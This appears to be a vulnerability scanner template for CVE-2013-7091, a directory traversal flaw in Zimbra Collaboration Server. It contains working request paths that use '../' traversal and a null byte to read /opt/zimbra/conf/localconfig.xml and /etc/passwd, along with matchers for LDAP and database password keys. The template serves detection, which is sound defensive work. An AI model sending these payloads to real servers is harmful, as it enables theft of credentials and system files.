id: CVE-2013-7091 info: name: Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion author: rubina119 severity: critical description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-7091 - https://www.exploit-db.com/exploits/30085 - https://www.exploit-db.com/exploits/30472 tags: cve,cve2013,zimbra,lfi classification: cve-id: CVE-2013-7091 requests: - method: GET path: - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00" - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00" stop-at-first-match: true matchers-condition: or matchers: - type: word words: - "zimbra_server_hostname" - "zimbra_ldap_userdn" - "zimbra_ldap_password" - "ldap_postfix_password" - "ldap_amavis_password" - "ldap_nginx_password" - "mysql_root_password" condition: or - type: regex regex: - "root=.*:0:0" # Enhanced by mp on 2022/02/24